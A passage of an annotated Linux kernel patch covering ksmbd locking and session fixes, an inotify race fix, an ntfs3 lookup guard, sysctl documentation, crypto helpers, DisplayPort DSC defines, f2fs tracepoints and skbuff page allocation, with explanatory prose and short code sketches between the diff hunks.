+ 				}
+@@ -6995,7 +7001,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    smb_lock->start > cmp_lock->start &&
+ 				    smb_lock->start < cmp_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("current lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -7006,14 +7012,14 @@ int smb2_lock(struct ksmbd_work *work)
+ 				      cmp_lock->end >= smb_lock->end)) &&
+ 				    !cmp_lock->zero_len && !smb_lock->zero_len) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("Not allow lock operation on exclusive lock range\n");
+ 					goto out;
+ 				}
+ 			}
+ 			spin_unlock(&conn->llist_lock);
+ 		}
+-		read_unlock(&conn_list_lock);
++		up_read(&conn_list_lock);
+ out_check_cl:
+ 		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
+ 			pr_err("Try to unlock nolocked range\n");
+@@ -8428,14 +8434,11 @@ int smb3_check_sign_req(struct ksmbd_work *work)
+ 	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return 0;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key) {
+@@ -8495,14 +8498,11 @@ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ 	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, work->conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key)
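
The smb2pdu.c changes close several session-setup races: the whole
SESSION_SETUP exchange now runs under the per-connection srv_mutex via
ksmbd_conn_lock()/ksmbd_conn_unlock(), reconnect state is re-checked at
several points, and logoff re-looks the session up after
ksmbd_conn_wait_idle() because it may have been destroyed while waiting.
The serialization skeleton (hedged sketch):

#include <linux/mutex.h>

struct conn_mutex_sketch { struct mutex srv_mutex; };

static int sess_setup_sketch(struct conn_mutex_sketch *conn)
{
	int rc = 0;

	mutex_lock(&conn->srv_mutex);	/* one setup in flight per conn */
	/* ... create or bind the session, authenticate ... */
	mutex_unlock(&conn->srv_mutex);
	return rc;
}
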
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+index f4baa9800f6ee..dd10f8031606b 100644
+--- a/fs/ksmbd/smb2pdu.h
++++ b/fs/ksmbd/smb2pdu.h
+@@ -61,6 +61,8 @@ struct preauth_integrity_info {
+ #define SMB2_SESSION_IN_PROGRESS	BIT(0)
+ #define SMB2_SESSION_VALID		BIT(1)
+ 
++#define SMB2_SESSION_TIMEOUT		(10 * HZ)
++
+ struct create_durable_req_v2 {
+ 	struct create_context ccontext;
+ 	__u8   Name[8];
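
SMB2_SESSION_TIMEOUT is ten seconds expressed in jiffies (10 * HZ holds at
any tick rate), and the new expiry check in user_session.c pairs it with
time_after(), which stays correct across jiffies wraparound where a plain
'>' would not. The comparison in isolation (illustrative names):

#include <linux/jiffies.h>

#define SESSION_TIMEOUT_SKETCH	(10 * HZ)

static bool session_expired_sketch(unsigned long last_active)
{
	/* time_after() is wraparound-safe */
	return time_after(jiffies, last_active + SESSION_TIMEOUT_SKETCH);
}
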
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 20e85e2701f26..eff7a1d793f00 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -333,7 +333,7 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		if (length == -EINTR) {
+ 			total_read = -ESHUTDOWN;
+ 			break;
+-		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
++		} else if (ksmbd_conn_need_reconnect(conn)) {
+ 			total_read = -EAGAIN;
+ 			break;
+ 		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
+diff --git a/fs/notify/inotify/inotify_fsnotify.c b/fs/notify/inotify/inotify_fsnotify.c
+index 49cfe2ae6d23d..993375f0db673 100644
+--- a/fs/notify/inotify/inotify_fsnotify.c
++++ b/fs/notify/inotify/inotify_fsnotify.c
+@@ -65,7 +65,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	struct fsnotify_event *fsn_event;
+ 	struct fsnotify_group *group = inode_mark->group;
+ 	int ret;
+-	int len = 0;
++	int len = 0, wd;
+ 	int alloc_len = sizeof(struct inotify_event_info);
+ 	struct mem_cgroup *old_memcg;
+ 
+@@ -80,6 +80,13 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	i_mark = container_of(inode_mark, struct inotify_inode_mark,
+ 			      fsn_mark);
+ 
++	/*
++	 * We can be racing with mark being detached. Don't report event with
++	 * invalid wd.
++	 */
++	wd = READ_ONCE(i_mark->wd);
++	if (wd == -1)
++		return 0;
+ 	/*
+ 	 * Whoever is interested in the event, pays for the allocation. Do not
+ 	 * trigger OOM killer in the target monitoring memcg as it may have
+@@ -110,7 +117,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	fsn_event = &event->fse;
+ 	fsnotify_init_event(fsn_event);
+ 	event->mask = mask;
+-	event->wd = i_mark->wd;
++	event->wd = wd;
+ 	event->sync_cookie = cookie;
+ 	event->name_len = len;
+ 	if (len)
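
The inotify fix snapshots i_mark->wd once with READ_ONCE() and uses that
snapshot both for the validity check and for the reported event, so a
concurrent watch removal can no longer slip a wd of -1 into an event after
the check has passed. Snapshot-then-use, in isolation (sketch):

#include <linux/compiler.h>

struct mark_sketch { int wd; };

static int handle_event_sketch(struct mark_sketch *mark, int *event_wd)
{
	int wd = READ_ONCE(mark->wd);	/* read the racy field once */

	if (wd == -1)			/* mark being detached: drop it */
		return 0;
	*event_wd = wd;			/* reuse the snapshot, never re-read */
	return 1;
}
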
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 45f95c1cb2584..e0cdc91d88a85 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -661,7 +661,8 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+ 
+-	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
++	wnd->free_bits =
++		kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/namei.c b/fs/ntfs3/namei.c
+index bc22cc321a74b..a9549e73081fb 100644
+--- a/fs/ntfs3/namei.c
++++ b/fs/ntfs3/namei.c
+@@ -86,6 +86,16 @@ static struct dentry *ntfs_lookup(struct inode *dir, struct dentry *dentry,
+ 		__putname(uni);
+ 	}
+ 
++	/*
++	 * Check for a null pointer:
++	 * if the MFT record of an ntfs inode is not a base record, inode->i_op
++	 * can be NULL. This causes a null pointer dereference in d_splice_alias().
++	 */
++	if (!IS_ERR_OR_NULL(inode) && !inode->i_op) {
++		iput(inode);
++		inode = ERR_PTR(-EINVAL);
++	}
++
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
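
The ntfs3 lookup guard converts a half-initialized inode (one whose i_op
was never set because its MFT record is not a base record) into an error
before d_splice_alias() can dereference it. The guard shape, as a
kernel-style sketch:

#include <linux/fs.h>
#include <linux/err.h>

static struct dentry *lookup_guard_sketch(struct inode *inode,
					  struct dentry *dentry)
{
	/* reject inodes that were never fully set up */
	if (!IS_ERR_OR_NULL(inode) && !inode->i_op) {
		iput(inode);
		inode = ERR_PTR(-EINVAL);
	}
	return d_splice_alias(inode, dentry);
}
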
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 9cc396b117bfd..0f38d558169a1 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -436,9 +436,6 @@ static inline u64 attr_svcn(const struct ATTRIB *attr)
+ 	return attr->non_res ? le64_to_cpu(attr->nres.svcn) : 0;
+ }
+ 
+-/* The size of resident attribute by its resident size. */
+-#define BYTES_PER_RESIDENT(b) (0x18 + (b))
+-
+ static_assert(sizeof(struct ATTRIB) == 0x48);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->res) == 0x08);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->nres) == 0x38);
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 48f2d60bd78a2..72f2b373221ed 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1281,7 +1281,10 @@ out:
+  * __register_sysctl_table - register a leaf sysctl table
+  * @set: Sysctl tree to register on
+  * @path: The path to the directory the sysctl table is in.
+- * @table: the top-level table structure
++ * @table: the top-level table structure without any child. This table
++ * 	 must not be freed after registration, so it must not live on the
++ * 	 stack; it can either be global or dynamically allocated by the
++ * 	 caller and freed after sysctl unregistration.
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1302,9 +1305,12 @@ out:
+  * proc_handler - the text handler routine (described below)
+  *
+  * extra1, extra2 - extra pointers usable by the proc handler routines
++ * XXX: we should eventually modify these to use long min / max [0]
++ * [0] https://lkml.kernel.org/87zgpte9o4.fsf@email.froward.int.ebiederm.org
+  *
+  * Leaf nodes in the sysctl tree will be represented by a single file
+- * under /proc; non-leaf nodes will be represented by directories.
++ * under /proc; non-leaf nodes (where child is not NULL) are not allowed,
++ * sysctl_check_table() verifies this.
+  *
+  * There must be a proc_handler routine for any terminal nodes.
+  * Several default handlers are available to cover common cases -
+@@ -1346,7 +1352,7 @@ struct ctl_table_header *__register_sysctl_table(
+ 
+ 	spin_lock(&sysctl_lock);
+ 	dir = &set->dir;
+-	/* Reference moved down the diretory tree get_subdir */
++	/* Reference moved down the directory tree get_subdir */
+ 	dir->header.nreg++;
+ 	spin_unlock(&sysctl_lock);
+ 
+@@ -1363,6 +1369,11 @@ struct ctl_table_header *__register_sysctl_table(
+ 		if (namelen == 0)
+ 			continue;
+ 
++		/*
++		 * namelen ensures that if name is "foo/bar/yay", only "foo" is
++		 * registered first. We traverse as if using mkdir -p and
++		 * return a ctl_dir for the last directory entry.
++		 */
+ 		dir = get_subdir(dir, name, namelen);
+ 		if (IS_ERR(dir))
+ 			goto fail;
+@@ -1388,8 +1399,15 @@ fail:
+ 
+ /**
+  * register_sysctl - register a sysctl table
+- * @path: The path to the directory the sysctl table is in.
+- * @table: the table structure
++ * @path: The path to the directory the sysctl table is in. If the path
++ * 	doesn't exist we will create it for you.
++ * @table: the table structure. The caller must ensure the life of the @table
++ * 	will be kept for the whole lifetime of the sysctl. It must not be
++ * 	freed until unregister_sysctl_table() is called with the table
++ * 	returned by this registration. If your code is non-modular then you
++ * 	don't need to call unregister_sysctl_table() and can instead use
++ * 	something like register_sysctl_init() which does not care about the
++ * 	result of the sysctl registration.
+  *
+  * Register a sysctl table. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1405,8 +1423,11 @@ EXPORT_SYMBOL(register_sysctl);
+ 
+ /**
+  * __register_sysctl_init() - register sysctl table to path
+- * @path: path name for sysctl base
+- * @table: This is the sysctl table that needs to be registered to the path
++ * @path: path name for sysctl base. If that path doesn't exist we will create
++ * 	it for you.
++ * @table: This is the sysctl table that needs to be registered to the path.
++ * 	The caller must ensure that @table stays alive for the whole
++ * 	lifetime of the sysctl.
+  * @table_name: The name of sysctl table, only used for log printing when
+  *              registration fails
+  *
+@@ -1418,10 +1439,7 @@ EXPORT_SYMBOL(register_sysctl);
+  * register_sysctl() failing on init are extremely low, and so for both reasons
+  * this function does not return any error as it is used by initialization code.
+  *
+- * Context: Can only be called after your respective sysctl base path has been
+- * registered. So for instance, most base directories are registered early on
+- * init before init levels are processed through proc_sys_init() and
+- * sysctl_init_bases().
++ * Context: if your base directory does not exist, it will be created for you.
+  */
+ void __init __register_sysctl_init(const char *path, struct ctl_table *table,
+ 				 const char *table_name)
+@@ -1551,6 +1569,7 @@ out:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this call so avoid its use.
+  *
+  * See __register_sysctl_table for more details.
+  */
+@@ -1622,6 +1641,7 @@ err_register_leaves:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this call so avoid future uses of it.
+  *
+  * See __register_sysctl_paths for more details.
+  */
+diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
+index f50c5d1725da5..224b860647083 100644
+--- a/include/crypto/algapi.h
++++ b/include/crypto/algapi.h
+@@ -265,4 +265,11 @@ enum {
+ 	CRYPTO_MSG_ALG_LOADED,
+ };
+ 
++static inline void crypto_request_complete(struct crypto_async_request *req,
++					   int err)
++{
++	crypto_completion_t complete = req->complete;
++	complete(req, err);
++}
++
+ #endif	/* _CRYPTO_ALGAPI_H */
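
The helper gives drivers one call for finishing an async request instead of
loading req->complete by hand. A minimal sketch (struct my_accel_dev is
hypothetical driver state):

	struct my_accel_dev {
		struct crypto_async_request *cur_req;
	};

	static void my_accel_done(struct my_accel_dev *dev, int err)
	{
		/* invokes req->complete(req, err) through the helper */
		crypto_request_complete(dev->cur_req, err);
	}
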
+diff --git a/include/drm/display/drm_dp.h b/include/drm/display/drm_dp.h
+index e934aab357bea..05f2cc03d03d9 100644
+--- a/include/drm/display/drm_dp.h
++++ b/include/drm/display/drm_dp.h
+@@ -240,6 +240,8 @@
+ #define DP_DSC_SUPPORT                      0x060   /* DP 1.4 */
+ # define DP_DSC_DECOMPRESSION_IS_SUPPORTED  (1 << 0)
+ # define DP_DSC_PASSTHROUGH_IS_SUPPORTED    (1 << 1)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_COMP_TO_COMP    (1 << 2)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_UNCOMP_TO_COMP  (1 << 3)
+ 
+ #define DP_DSC_REV                          0x061
+ # define DP_DSC_MAJOR_MASK                  (0xf << 0)
+@@ -278,12 +280,14 @@
+ 
+ #define DP_DSC_BLK_PREDICTION_SUPPORT       0x066
+ # define DP_DSC_BLK_PREDICTION_IS_SUPPORTED (1 << 0)
++# define DP_DSC_RGB_COLOR_CONV_BYPASS_SUPPORT (1 << 1)
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_LOW       0x067   /* eDP 1.4 */
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_HI        0x068   /* eDP 1.4 */
+ # define DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK  (0x3 << 0)
+-# define DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT 8
++# define DP_DSC_MAX_BPP_DELTA_VERSION_MASK  (0x3 << 5)	/* eDP 1.5 & DP 2.0 */
++# define DP_DSC_MAX_BPP_DELTA_AVAILABILITY  (1 << 7)	/* eDP 1.5 & DP 2.0 */
+ 
+ #define DP_DSC_DEC_COLOR_FORMAT_CAP         0x069
+ # define DP_DSC_RGB                         (1 << 0)
+@@ -345,11 +349,13 @@
+ # define DP_DSC_24_PER_DP_DSC_SINK          (1 << 2)
+ 
+ #define DP_DSC_BITS_PER_PIXEL_INC           0x06F
++# define DP_DSC_RGB_YCbCr444_MAX_BPP_DELTA_MASK 0x1f
++# define DP_DSC_RGB_YCbCr420_MAX_BPP_DELTA_MASK 0xe0
+ # define DP_DSC_BITS_PER_PIXEL_1_16         0x0
+ # define DP_DSC_BITS_PER_PIXEL_1_8          0x1
+ # define DP_DSC_BITS_PER_PIXEL_1_4          0x2
+ # define DP_DSC_BITS_PER_PIXEL_1_2          0x3
+-# define DP_DSC_BITS_PER_PIXEL_1            0x4
++# define DP_DSC_BITS_PER_PIXEL_1_1          0x4
+ 
+ #define DP_PSR_SUPPORT                      0x070   /* XXX 1.2? */
+ # define DP_PSR_IS_SUPPORTED                1
+diff --git a/include/drm/display/drm_dp_helper.h b/include/drm/display/drm_dp_helper.h
+index ab55453f2d2cd..ade9df59e156a 100644
+--- a/include/drm/display/drm_dp_helper.h
++++ b/include/drm/display/drm_dp_helper.h
+@@ -181,9 +181,8 @@ static inline u16
+ drm_edp_dsc_sink_output_bpp(const u8 dsc_dpcd[DP_DSC_RECEIVER_CAP_SIZE])
+ {
+ 	return dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_LOW - DP_DSC_SUPPORT] |
+-		(dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK <<
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT);
++		((dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
++		  DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK) << 8);
+ }
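
A worked example of the corrected masking (DPCD values hypothetical; the
field counts 1/16 bpp units):

	/* Say DPCD 0x067 (LOW) = 0x80 and DPCD 0x068 (HI) = 0x02:
	 *   old: 0x80 | (0x02 & (0x3 << 8))  = 0x80   (HI bits lost, since
	 *        & binds looser than << and the mask was shifted first)
	 *   new: 0x80 | ((0x02 & 0x3) << 8)  = 0x280  = 640
	 * 640 * 1/16 bpp = a 40 bpp maximum.
	 */
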
+ 
+ static inline u32
+diff --git a/include/linux/crypto.h b/include/linux/crypto.h
+index 2324ab6f1846b..e3c4be29aaccb 100644
+--- a/include/linux/crypto.h
++++ b/include/linux/crypto.h
+@@ -176,6 +176,7 @@ struct crypto_async_request;
+ struct crypto_tfm;
+ struct crypto_type;
+ 
++typedef struct crypto_async_request crypto_completion_data_t;
+ typedef void (*crypto_completion_t)(struct crypto_async_request *req, int err);
+ 
+ /**
+@@ -595,6 +596,11 @@ struct crypto_wait {
+ /*
+  * Async ops completion helper functions
+  */
++static inline void *crypto_get_completion_data(crypto_completion_data_t *req)
++{
++	return req->data;
++}
++
+ void crypto_req_done(struct crypto_async_request *req, int err);
+ 
+ static inline int crypto_wait_req(int err, struct crypto_wait *wait)
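
A hedged sketch of a completion callback recovering its context through the
new accessor (struct my_ctx is illustrative):

	struct my_ctx {
		struct completion done;
		int status;
	};

	static void my_complete(struct crypto_async_request *req, int err)
	{
		struct my_ctx *ctx = crypto_get_completion_data(req); /* req->data */

		ctx->status = err;
		complete(&ctx->done);
	}
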
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 45c3d62e616d8..95f33dadb2be2 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -567,6 +567,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F3 0x166d
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F3 0x14e3
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F3 0x14f3
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F3 0x12fb
+ #define PCI_DEVICE_ID_AMD_CNB17H_F3	0x1703
+ #define PCI_DEVICE_ID_AMD_LANCE		0x2000
+ #define PCI_DEVICE_ID_AMD_LANCE_HOME	0x2001
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index eb53e96b7a29c..5f58684f6107a 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -48,6 +48,7 @@ TRACE_DEFINE_ENUM(CP_DISCARD);
+ TRACE_DEFINE_ENUM(CP_TRIMMED);
+ TRACE_DEFINE_ENUM(CP_PAUSE);
+ TRACE_DEFINE_ENUM(CP_RESIZE);
++TRACE_DEFINE_ENUM(EX_READ);
+ 
+ #define show_block_type(type)						\
+ 	__print_symbolic(type,						\
+@@ -1559,28 +1560,31 @@ TRACE_EVENT(f2fs_issue_flush,
+ 
+ TRACE_EVENT(f2fs_lookup_extent_tree_start,
+ 
+-	TP_PROTO(struct inode *inode, unsigned int pgofs),
++	TP_PROTO(struct inode *inode, unsigned int pgofs, enum extent_type type),
+ 
+-	TP_ARGS(inode, pgofs),
++	TP_ARGS(inode, pgofs, type),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+ 		__field(unsigned int, pgofs)
++		__field(enum extent_type, type)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev = inode->i_sb->s_dev;
+ 		__entry->ino = inode->i_ino;
+ 		__entry->pgofs = pgofs;
++		__entry->type = type;
+ 	),
+ 
+-	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u",
++	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u, type = %s",
+ 		show_dev_ino(__entry),
+-		__entry->pgofs)
++		__entry->pgofs,
++		__entry->type == EX_READ ? "Read" : "N/A")
+ );
+ 
+-TRACE_EVENT_CONDITION(f2fs_lookup_extent_tree_end,
++TRACE_EVENT_CONDITION(f2fs_lookup_read_extent_tree_end,
+ 
+ 	TP_PROTO(struct inode *inode, unsigned int pgofs,
+ 						struct extent_info *ei),
+@@ -1594,8 +1598,8 @@ TRACE_EVENT_CONDITION(f2fs_lookup_extent_tree_end,
+ 		__field(ino_t,	ino)
+ 		__field(unsigned int, pgofs)
+ 		__field(unsigned int, fofs)
+-		__field(u32, blk)
+ 		__field(unsigned int, len)
++		__field(u32, blk)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -1603,26 +1607,26 @@ TRACE_EVENT_CONDITION(f2fs_lookup_extent_tree_end,
+ 		__entry->ino = inode->i_ino;
+ 		__entry->pgofs = pgofs;
+ 		__entry->fofs = ei->fofs;
+-		__entry->blk = ei->blk;
+ 		__entry->len = ei->len;
++		__entry->blk = ei->blk;
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u, "
+-		"ext_info(fofs: %u, blk: %u, len: %u)",
++		"read_ext_info(fofs: %u, len: %u, blk: %u)",
+ 		show_dev_ino(__entry),
+ 		__entry->pgofs,
+ 		__entry->fofs,
+-		__entry->blk,
+-		__entry->len)
++		__entry->len,
++		__entry->blk)
+ );
+ 
+-TRACE_EVENT(f2fs_update_extent_tree_range,
++TRACE_EVENT(f2fs_update_read_extent_tree_range,
+ 
+-	TP_PROTO(struct inode *inode, unsigned int pgofs, block_t blkaddr,
+-						unsigned int len,
++	TP_PROTO(struct inode *inode, unsigned int pgofs, unsigned int len,
++						block_t blkaddr,
+ 						unsigned int c_len),
+ 
+-	TP_ARGS(inode, pgofs, blkaddr, len, c_len),
++	TP_ARGS(inode, pgofs, len, blkaddr, c_len),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+@@ -1637,67 +1641,73 @@ TRACE_EVENT(f2fs_update_extent_tree_range,
+ 		__entry->dev = inode->i_sb->s_dev;
+ 		__entry->ino = inode->i_ino;
+ 		__entry->pgofs = pgofs;
+-		__entry->blk = blkaddr;
+ 		__entry->len = len;
++		__entry->blk = blkaddr;
+ 		__entry->c_len = c_len;
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u, "
+-					"blkaddr = %u, len = %u, "
+-					"c_len = %u",
++				"len = %u, blkaddr = %u, c_len = %u",
+ 		show_dev_ino(__entry),
+ 		__entry->pgofs,
+-		__entry->blk,
+ 		__entry->len,
++		__entry->blk,
+ 		__entry->c_len)
+ );
+ 
+ TRACE_EVENT(f2fs_shrink_extent_tree,
+ 
+ 	TP_PROTO(struct f2fs_sb_info *sbi, unsigned int node_cnt,
+-						unsigned int tree_cnt),
++			unsigned int tree_cnt, enum extent_type type),
+ 
+-	TP_ARGS(sbi, node_cnt, tree_cnt),
++	TP_ARGS(sbi, node_cnt, tree_cnt, type),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(unsigned int, node_cnt)
+ 		__field(unsigned int, tree_cnt)
++		__field(enum extent_type, type)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev = sbi->sb->s_dev;
+ 		__entry->node_cnt = node_cnt;
+ 		__entry->tree_cnt = tree_cnt;
++		__entry->type = type;
+ 	),
+ 
+-	TP_printk("dev = (%d,%d), shrunk: node_cnt = %u, tree_cnt = %u",
++	TP_printk("dev = (%d,%d), shrunk: node_cnt = %u, tree_cnt = %u, type = %s",
+ 		show_dev(__entry->dev),
+ 		__entry->node_cnt,
+-		__entry->tree_cnt)
++		__entry->tree_cnt,
++		__entry->type == EX_READ ? "Read" : "N/A")
+ );
+ 
+ TRACE_EVENT(f2fs_destroy_extent_tree,
+ 
+-	TP_PROTO(struct inode *inode, unsigned int node_cnt),
++	TP_PROTO(struct inode *inode, unsigned int node_cnt,
++				enum extent_type type),
+ 
+-	TP_ARGS(inode, node_cnt),
++	TP_ARGS(inode, node_cnt, type),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+ 		__field(unsigned int, node_cnt)
++		__field(enum extent_type, type)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev = inode->i_sb->s_dev;
+ 		__entry->ino = inode->i_ino;
+ 		__entry->node_cnt = node_cnt;
++		__entry->type = type;
+ 	),
+ 
+-	TP_printk("dev = (%d,%d), ino = %lu, destroyed: node_cnt = %u",
++	TP_printk("dev = (%d,%d), ino = %lu, destroyed: node_cnt = %u, type = %s",
+ 		show_dev_ino(__entry),
+-		__entry->node_cnt)
++		__entry->node_cnt,
++		__entry->type == EX_READ ? "Read" : "N/A")
+ );
+ 
+ DECLARE_EVENT_CLASS(f2fs_sync_dirty_inodes,
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 84d5b649b95fe..92d8e2c4edda0 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -1251,7 +1251,7 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+ /*
+  * lock for reading
+  */
+-static inline int __down_read_common(struct rw_semaphore *sem, int state)
++static __always_inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
+ 	int ret = 0;
+ 	long count;
+@@ -1269,17 +1269,17 @@ out:
+ 	return ret;
+ }
+ 
+-static inline void __down_read(struct rw_semaphore *sem)
++static __always_inline void __down_read(struct rw_semaphore *sem)
+ {
+ 	__down_read_common(sem, TASK_UNINTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_interruptible(struct rw_semaphore *sem)
++static __always_inline int __down_read_interruptible(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_INTERRUPTIBLE);
+ }
+ 
+-static inline int __down_read_killable(struct rw_semaphore *sem)
++static __always_inline int __down_read_killable(struct rw_semaphore *sem)
+ {
+ 	return __down_read_common(sem, TASK_KILLABLE);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 597c1f17d3889..ccfd9053754a9 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -1544,7 +1544,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ {
+ 	int num_frags = skb_shinfo(skb)->nr_frags;
+ 	struct page *page, *head = NULL;
+-	int i, new_frags;
++	int i, order, psize, new_frags;
+ 	u32 d_off;
+ 
+ 	if (skb_shared(skb) || skb_unclone(skb, gfp_mask))
+@@ -1553,9 +1553,17 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 	if (!num_frags)
+ 		goto release;
+ 
+-	new_frags = (__skb_pagelen(skb) + PAGE_SIZE - 1) >> PAGE_SHIFT;
++	/* We might have to allocate high order pages, so compute what minimum
++	 * page order is needed.
++	 */
++	order = 0;
++	while ((PAGE_SIZE << order) * MAX_SKB_FRAGS < __skb_pagelen(skb))
++		order++;
++	psize = (PAGE_SIZE << order);
++
++	new_frags = (__skb_pagelen(skb) + psize - 1) >> (PAGE_SHIFT + order);
+ 	for (i = 0; i < new_frags; i++) {
+-		page = alloc_page(gfp_mask);
++		page = alloc_pages(gfp_mask | __GFP_COMP, order);
+ 		if (!page) {
+ 			while (head) {
+ 				struct page *next = (struct page *)page_private(head);
+@@ -1582,11 +1590,11 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 			vaddr = kmap_atomic(p);
+ 
+ 			while (done < p_len) {
+-				if (d_off == PAGE_SIZE) {
++				if (d_off == psize) {
+ 					d_off = 0;
+ 					page = (struct page *)page_private(page);
+ 				}
+-				copy = min_t(u32, PAGE_SIZE - d_off, p_len - done);
++				copy = min_t(u32, psize - d_off, p_len - done);
+ 				memcpy(page_address(page) + d_off,
+ 				       vaddr + p_off + done, copy);
+ 				done += copy;
+@@ -1602,7 +1610,7 @@ int skb_copy_ubufs(struct sk_buff *skb, gfp_t gfp_mask)
+ 
+ 	/* skb frags point to kernel buffers */
+ 	for (i = 0; i < new_frags - 1; i++) {
+-		__skb_fill_page_desc(skb, i, head, 0, PAGE_SIZE);
